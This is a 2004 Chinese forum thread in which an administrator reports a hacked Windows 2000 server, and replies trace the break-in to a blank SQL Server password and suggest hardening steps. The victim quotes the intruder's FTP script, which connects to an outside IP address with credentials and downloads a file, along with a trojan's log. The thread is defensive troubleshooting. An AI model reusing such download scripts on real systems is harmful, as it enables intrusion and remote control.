9,506
社区成员
发帖
与我相关
我的任务
分享我想我的电脑被黑了!
上午,我的win2000 server启动并上网后。中途我一直没管它,下午因其他客户机上网速度很慢打开,发现进程中有很多FTP.EXE 和CMD.exe
C盘根目录下有四个文件,四个文本文件标题分别为1,2,3,ra_slave另一个文件为一个应用程序名称为dare.exe
1,2,3文本的内容为:
open 61.132.102.88
tty1688
lovetty
bin
lcd c;\
lcd c:\
get a.txt c:\a.txt
ra_slave文本内容为:
[01/12/04 19:10:36]
[01/12/04 19:10:36]
[01/12/04 19:10:36] --[Run]--
[01/12/04 19:10:36] 2000 build 2195 Service Pack 4
[01/12/04 19:10:36] Admin: y
[01/12/04 19:10:36] 3.8.26
[01/12/04 19:10:36] Path: C:\WINNT\Slave.exe
[01/12/04 19:10:36] COMCTL32 v5.81 Win2K
[01/12/04 19:10:36] server 192.168.0.1
[01/12/04 19:10:36] ---- RunServer
[01/12/04 19:10:36] Main:NT
[01/12/04 19:10:40] *Conn with 240.64.144.0 Closed
[01/12/04 19:10:40] *Conn with 255.255.255.255 Closed
[01/12/04 19:10:40] Start
[01/12/04 19:10:40] CH:Daemon
[01/12/04 19:10:40] FB:Daemon
[01/12/04 19:10:40] RC:Daemon
[01/12/04 19:10:41] 00-E0-4C-A1-02-47,,192.168.0.1,server,4000,Not Logged,00:01:09,2000 Server build 2195 Service Pack 4,GenuineIntel x86 Family 15 Model 1 Stepping 2 1700Mhz,290MB/384MB,C: 6.64GB/9.31GB; D: 10.27GB/13.96GB; E: 3.62GB/6.51GB; F: 6.89GB/12.10GB; G: 6.70GB/7.91GB; H: 3.13GB/7.41GB,OFF,-
[01/12/04 19:10:42] *Conn with 112.66.144.0 Closed
[01/12/04 19:10:42] FB:initOK
[01/12/04 19:10:42] FB:Wait
[01/12/04 19:11:56] User: Not Logged => Administrator
请问,此黑客是如何攻进我的电脑的,我要如何作防范措施。我的服务器只开放了80,138,139端口。
C盘根目录下有四个文件,四个文本文件标题分别为1,2,3,ra_slave另一个文件为一个应用程序名称为dare.exe
1,2,3文本的内容为:
open 61.132.102.88
tty1688
lovetty
bin
lcd c;\
lcd c:\
get a.txt c:\a.txt
ra_slave文本内容为:
[01/12/04 19:10:36]
[01/12/04 19:10:36]
[01/12/04 19:10:36] --[Run]--
[01/12/04 19:10:36] 2000 build 2195 Service Pack 4
[01/12/04 19:10:36] Admin: y
[01/12/04 19:10:36] 3.8.26
[01/12/04 19:10:36] Path: C:\WINNT\Slave.exe
[01/12/04 19:10:36] COMCTL32 v5.81 Win2K
[01/12/04 19:10:36] server 192.168.0.1
[01/12/04 19:10:36] ---- RunServer
[01/12/04 19:10:36] Main:NT
[01/12/04 19:10:40] *Conn with 240.64.144.0 Closed
[01/12/04 19:10:40] *Conn with 255.255.255.255 Closed
[01/12/04 19:10:40] Start
[01/12/04 19:10:40] CH:Daemon
[01/12/04 19:10:40] FB:Daemon
[01/12/04 19:10:40] RC:Daemon
[01/12/04 19:10:41] 00-E0-4C-A1-02-47,,192.168.0.1,server,4000,Not Logged,00:01:09,2000 Server build 2195 Service Pack 4,GenuineIntel x86 Family 15 Model 1 Stepping 2 1700Mhz,290MB/384MB,C: 6.64GB/9.31GB; D: 10.27GB/13.96GB; E: 3.62GB/6.51GB; F: 6.89GB/12.10GB; G: 6.70GB/7.91GB; H: 3.13GB/7.41GB,OFF,-
[01/12/04 19:10:42] *Conn with 112.66.144.0 Closed
[01/12/04 19:10:42] FB:initOK
[01/12/04 19:10:42] FB:Wait
[01/12/04 19:11:56] User: Not Logged => Administrator
请问,此黑客是如何攻进我的电脑的,我要如何作防范措施。我的服务器只开放了80,138,139端口。
...全文
请发表友善的回复…
发表回复
skyforever109 2004-01-14
- 打赏
- 举报
哈哈 谢谢了 兄弟 我是想看看三个三角要多少分
呵呵
呵呵
flyfreeman 2004-01-14
- 打赏
- 举报
哈哈,给了你95,够不够啊
skyforever109 2004-01-14
- 打赏
- 举报
SQY
flyfreeman 2004-01-14
- 打赏
- 举报
刚刚结贴出错,下午再给分,谢谢兄弟们!特别是“天王”兄
skyforever109 2004-01-14
- 打赏
- 举报
解决了吧 是不是该给我满分啊
哈哈
兄弟 你是一个不称职的网管 这样的错误以后一定不要在次出现
公司的资料一旦丢失 你可就惨了 多学吧
哈哈
兄弟 你是一个不称职的网管 这样的错误以后一定不要在次出现
公司的资料一旦丢失 你可就惨了 多学吧
flyfreeman 2004-01-14
- 打赏
- 举报
谢谢你
我的D盘下的确是那些文件,SQL也没有设密码
以后多向你们学习
我的D盘下的确是那些文件,SQL也没有设密码
以后多向你们学习
flyfreeman 2004-01-14
- 打赏
- 举报
谢谢你
是的,我的D盘下有那些东东
以后多向您们学习!
是的,我的D盘下有那些东东
以后多向您们学习!
skyforever109 2004-01-14
- 打赏
- 举报
你的机器D:\下有一个股市风暴的文件夹还有一个hacker的文件夹对吧
你的盘符还是满多的吗 C D E F G H I
黑你的人是从你的SQL下手的 你的口令为空 很轻松就可以进入你的机器的
更改一个密码吧 在去找一些SQL的补丁文件 你的机器我只发现这个漏洞
但是足以对你进行入侵了 多看些关于网络安全的文章 对于网管有好处的
适当的学学入侵 从中找到解决的方法 OK?
你的盘符还是满多的吗 C D E F G H I
黑你的人是从你的SQL下手的 你的口令为空 很轻松就可以进入你的机器的
更改一个密码吧 在去找一些SQL的补丁文件 你的机器我只发现这个漏洞
但是足以对你进行入侵了 多看些关于网络安全的文章 对于网管有好处的
适当的学学入侵 从中找到解决的方法 OK?
flyfreeman 2004-01-14
- 打赏
- 举报
我把现在的IP发给你了,在CSDN的短消息里
flyfreeman 2004-01-14
- 打赏
- 举报
我的MSN好久没用了,谢谢
skyforever109 2004-01-14
- 打赏
- 举报
你在给我发一个吧 公司不允许上QQ
你昨天的我看到了 不知道今天换成了什么IP
你昨天的我看到了 不知道今天换成了什么IP
flyfreeman 2004-01-14
- 打赏
- 举报
我的QQ是:58920849
skyforever109 2004-01-14
- 打赏
- 举报
对不起兄弟 我没有收到啊
要不你加我的MSN吧
sky_kingforever@hotmail.com
要不你加我的MSN吧
sky_kingforever@hotmail.com
shixianyong 2004-01-14
- 打赏
- 举报
Windows Update
http://www.microsoft.com/taiwan/security/protect/
http://www.microsoft.com/taiwan/security/protect/
flyfreeman 2004-01-14
- 打赏
- 举报
skyforever109(天王)
你好,我已把我目前的IP传给你了,我的机子是ADSL拨号,在上午IP地址不会改变
谢谢您
你好,我已把我目前的IP传给你了,我的机子是ADSL拨号,在上午IP地址不会改变
谢谢您
回炉重造,学习编程中。。。 2004-01-13
- 打赏
- 举报
先查查病毒,到dos下会比较彻底些,然后要装上防火墙、杀毒软件,把不用的端口屏蔽掉,不用的服务也关掉
yishao 2004-01-13
- 打赏
- 举报
138,139端口。
关闭这两个,没有必要开的
网上邻居->属性->本地连接->属性->INTERNET协议(TCP/IP)->属性->高级->选项T->CP/IP筛选->属性,在里面进行修改就可
关闭这两个,没有必要开的
网上邻居->属性->本地连接->属性->INTERNET协议(TCP/IP)->属性->高级->选项T->CP/IP筛选->属性,在里面进行修改就可
skyforever109 2004-01-13
- 打赏
- 举报
你看看有没有什么共享的文件 把你默认的共享删掉吧
DOS下
net share ipc$ /del
net share admin$ /del
net share c$ /del
net share d$ /del
net share e$ /del
既然你发现你的机器发现了新的莫名其妙的用户那么你就应该把你的用户密码更改一下
有可能被人爆破了 不排除内部人干的
al,shanlu 这个好象是哪个益处程序添加的用户 把你开的服务告诉我
我帮你看看 或者把IP发给我 用CSDN消息也可以
我帮你检测一下 如果信的过的话(在没有解决问题前)
DOS下
net share ipc$ /del
net share admin$ /del
net share c$ /del
net share d$ /del
net share e$ /del
既然你发现你的机器发现了新的莫名其妙的用户那么你就应该把你的用户密码更改一下
有可能被人爆破了 不排除内部人干的
al,shanlu 这个好象是哪个益处程序添加的用户 把你开的服务告诉我
我帮你看看 或者把IP发给我 用CSDN消息也可以
我帮你检测一下 如果信的过的话(在没有解决问题前)
flyfreeman 2004-01-13
- 打赏
- 举报
目前微软件发布的补丁我都打过
我的杀毒软件和防火墙都是瑞星个人版的,都已升级到最高版本
我刚刚查看用户,莫名的增加了al,shanlu两个用户,我已删除
用netstat查看,有很多端口开着,如445,443等,但我不明白,我在本地连接——属性——TCP/IP——高级中设的只允许80,138,139端口使用,但现在却打开了这么多端口
我的杀毒软件和防火墙都是瑞星个人版的,都已升级到最高版本
我刚刚查看用户,莫名的增加了al,shanlu两个用户,我已删除
用netstat查看,有很多端口开着,如445,443等,但我不明白,我在本地连接——属性——TCP/IP——高级中设的只允许80,138,139端口使用,但现在却打开了这么多端口
loxi 2004-01-13
- 打赏
- 举报
他用的是一个远程控制工具,我想他多半是通过溢出获取了一个SYSTEM权限,然后上传了一个SLAVE,请检查以下你的IIS的补丁的情况
加载更多回复(2)
